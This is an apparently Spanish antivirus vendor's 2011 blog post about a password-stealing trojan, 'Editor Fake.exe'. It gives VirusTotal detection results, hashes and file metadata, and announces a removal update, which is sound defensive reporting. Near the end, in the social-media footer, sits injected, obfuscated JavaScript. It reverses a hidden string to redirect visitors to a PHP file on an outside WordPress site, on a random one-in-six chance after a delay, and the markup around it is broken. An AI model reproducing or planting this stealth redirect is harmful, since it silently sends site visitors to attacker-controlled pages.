Muestra recibida para analizar de Editor Fake.exe
Una nueva variante no controlada actualmente ni por Bit Defender, ni por Dr Web, ni por F-Prot, ni por Kaspersky, ni por Microsoft, entre otros conocidos AV, la hemos recibido para analizar y pasado a monitorizar.
File name: Editor Fake.exe
Submission date: 2011-02-07 19:05:07 (UTC)
Current status: finished
Result: 21 /43 (48.8%)
VT Community
malware
Safety score: 0.0%
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.02.06.00 2011.02.06 Spyware/Win32.Agent
AntiVir 7.11.2.92 2011.02.07 TR/PWSteal.Z
Antiy-AVL 2.0.3.7 2011.01.28 –
Avast 4.8.1351.0 2011.02.07 Win32:Trojan-gen
Avast5 5.0.677.0 2011.02.07 Win32:Trojan-gen
AVG 10.0.0.1190 2011.02.07 PSW.Generic5.ABMV
BitDefender 7.2 2011.02.07 –
CAT-QuickHeal 11.00 2011.02.07 –
ClamAV 0.96.4.0 2011.02.07 –
Commtouch 5.2.11.5 2011.02.07 –
Comodo 7607 2011.02.07 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.02.07 –
Emsisoft 5.1.0.2 2011.02.07 –
eSafe 7.0.17.0 2011.02.06 –
eTrust-Vet 36.1.8144 2011.02.07 –
F-Prot 4.6.2.117 2011.02.04 –
F-Secure 9.0.16160.0 2011.02.07 –
Fortinet 4.2.254.0 2011.02.07 –
GData 21 2011.02.07 Win32:Trojan-gen
Ikarus T3.1.1.97.0 2011.02.07 –
Jiangmin 13.0.900 2011.02.05 –
K7AntiVirus 9.81.3771 2011.02.07 Trojan
Kaspersky 7.0.0.125 2011.02.07 –
McAfee 5.400.0.1158 2011.02.07 Generic PWS.y
McAfee-GW-Edition 2010.1C 2011.02.07 Generic PWS.y
Microsoft 1.6502 2011.02.07 –
NOD32 5853 2011.02.07 probably a variant of Win32/Spy.Agent.GYIUPET
Norman 6.07.03 2011.02.07 W32/Obfuscated.T2!genr
nProtect 2011-01-27.01 2011.02.02 Trojan/W32.Pwsteal.319488
Panda 10.0.3.5 2011.02.07 Generic Trojan
PCTools 7.0.3.5 2011.02.07 Trojan-PSW.Generic
Prevx 3.0 2011.02.07 High Risk Information Stealer
Rising 23.44.00.08 2011.02.07 –
Sophos 4.61.0 2011.02.07 Mal/Generic-L
SUPERAntiSpyware 4.40.0.1006 2011.02.07 –
Symantec 20101.3.0.103 2011.02.07 Infostealer
TheHacker 6.7.0.1.125 2011.02.07 –
TrendMicro 9.200.0.1012 2011.02.07 TSPY_AGENT.AAJS
TrendMicro-HouseCall 9.200.0.1012 2011.02.07 TSPY_AGENT.AAJS
VBA32 3.12.14.3 2011.02.07 –
VIPRE 8338 2011.02.07 Trojan-PSW.Win32.Hooker.c
ViRobot 2011.2.7.4297 2011.02.07 –
VirusBuster 13.6.187.0 2011.02.07 –
Additional informationShow all
MD5 : c5698f228449603b745293733acf380f
SHA1 : 32d27b8efb014095e1039936ca98cebfac9ac834
File size : 319488 bytes
publisher….: tecnika
copyright….: n/a
product……: EDITOR_1
description..: n/a
original name: Editor Fake.exe
internal name: Editor Fake
file version.: 1.00
En cuanto hayamos terminado, pasaremos a controlarla, de lo cual informaremos
saludos
ms, 8-2-2011
ANEXO:
Al monitorizarlo aparece:
to, en www.threatexpert.com vemos esta informacion:
Al respecto de este Editor de troyanos, se implementa su control y eliminacion como PWS-Editor FAKE, a partir del ELISTARA 22.56 de hoy, que estará disponible en nuestra web a partir de las 19 h.
ms.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tor-Fake.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.